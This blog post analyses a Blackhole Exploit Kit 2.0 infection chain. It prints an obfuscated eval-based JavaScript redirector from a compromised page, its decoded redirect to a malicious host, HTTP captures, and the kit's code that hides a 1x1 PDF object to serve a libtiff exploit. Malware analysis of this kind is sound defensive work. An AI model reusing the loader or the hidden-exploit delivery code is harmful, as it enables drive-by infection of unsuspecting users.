Pages

Sep 28, 2012

An Evening with Blackhole Exploit Kit v2.0 II

Continuing from the previous post, I've managed to get another link of blackhole exploit page that redirect user to load PDF exploit, and getting that PDF exploit sample really made my day (even though it is early in the morning).

The url doesn't really present as standard blackhole url parameter as its extension is .htm, but I've been informed by the source that it is marked as JS/Blacole, so why don't give it a try.

GET /osc.htm HTTP/1.0
User-Agent: LAB69/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: college.unibel.by
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

HTTP/1.1 200 OK
Date: Thu, 27 Sep 2012 22:01:40 GMT
Server: Apache/2.2.22 (Win32)
Last-Modified: Thu, 27 Sep 2012 22:00:59 GMT
ETag: "1300000001fa44-3d9-4cab613107f95"
Accept-Ranges:  none
Content-Length: 985
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html

2012-09-27 22:05:48 URL:hxxp://college.unibel[.]by/osc.htm [985/985] -> "osc.htm"

The content of osc.htm looks like below.

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>page15</title>
 </head>
 <body>

<h1><b>Please wait a moment. You will be forwarded...</h1></b>

<script>v="va"+"l";try{ebgserb++;}catch(snregrx){try{fbwenrn&&325}catch(ztbet){m=Math;ev=window[""+"e"+v];}ff="fromC"+"ha";if(020==0x10)ff+="rCode";n="134&&114&&130&&66&&77&&69&&73&&76&&26&&135&&113&&131&&66&&78&&134&&114&&130&&66&&75&&27&&121&&119&&56&&135&&113&&131&&65&&78&&77&&135&&113&&131&&66&&58&&48&&140&&116&&128&&115&&134&&125&&118&&126&&133&&62&&125&&127&&116&&113&&133&&121&&128&&126&&78&&50&&121&&132&&133&&128&&75&&63&&64&&131&&118&&115&&133&&113&&127&&132&&118&&131&&62&&136&&63&&130&&134&&74&&73&&64&&73&&64&&64&&118&&128&&130&&134&&125&&64&&124&&122&&126&&124&&131&&64&&115&&128&&124&&134&&125&&127&&62&&129&&120&&129&&50&&76&&141".split("&&");h=2;s="";if(m)for(i=0;i-107!=0;i=1+i){k=i;s+=String[ff](n[i]-(020+i%h));}if(020==0x10)ev(s);}</script>

 </body>
</html>

It is a normal obfuscation pattern for blackhole to redirect user to another page containing the exploit. By deobfuscating the javascript, I manage to get the url for redirection and consequently get the content of the url.

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://sectantes-x[.]ru:8080/forum/links/column.php";}

GET /forum/links/column.php HTTP/1.0
User-Agent: LAB69/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: sectantes-x.ru:8080
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 27 Sep 2012 22:09:56 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 12306

2012-09-27 22:12:02 URL:hxxp://sectantes-x[].ru:8080/forum/links/column.php [12306/12306] -> "column.php" [1]

The content of column.php is somehow human-unreadable since it was compressed with gzip compression. With a little help from php gzinflate(), I managed to get it uncompressed. Tested with my previous yara rule, it matched the signature for blackhole exploit page :)

[azizan@lab69 analysis]# yara -r ../Blackhole_Exploit_Page.yar column.php
Blackhole2_exploit_page column.php

After deobfuscation process, I get the PluginDetect page that check for user's vulnerable version of Adobe Reader. You may find the beautified version of deobfuscated code HERE.

Unlike other PluginDetect page that I've seen, which scan the version for Adobe Reader, Flash, Java, and etc, this version of PluginDetect page is just looking only for Adobe Reader version to serve PDF exploit.

I'm quite interested with how blackhole serve PDF exploit to user after detecting Adobe Reader's version. From beautified code link I pasted above, blackhole use function x() to craft the url parameter values that redirect user to download PDF exploit.

function x(s) {
    d = [];
    for (i = 0; i < s.length; i++) {
        k = (s.charCodeAt(i) - 46).toString(16);
        if (k.length == 1) k = "0" + k;
        d.push(k);
    };
    return d.join("");
}

show_pdf2 = function (src) {
        var p = document.createElement('object');
        p.setAttribute('type', 'application/pdf');
        p.setAttribute('data', src);
        p.setAttribute('width', 1);
        p.setAttribute('height', 1);
        document.body.appendChild(p)
    };
    show_pdf2(window.location + "?cpdgszkh=" + x("89719") + "&uln=" + x("r") + "&rfor=3307093738070736060b&wjlajcro=" + x(pdfver.join(".")));

By using function x(), I managed to get full path to download the PDF exploit sample packaged with libtiff exploit.

column.php?cpdgszkh=0a0b09030b&uln=44&rfor=3307093738070736060b&wjlajcro=0b00040003

When I finished downloading the PDF sample, I was wondering whether blackhole uses the parameter value to protect the sample from easily obtained by security researcher, thus I play around with the parameter value, (1) with different value of pdfver.join(".") for wjlajcro, (2) arbitrary character, not according to the output of function x(), and all I got was the same samples that lead to libtiff exploit. And I wonder again what is the purpose of encoding the path with x(), and I got no idea.

For the PDF exploit analysis, I'll be back on the next post. Until next time, bye bye.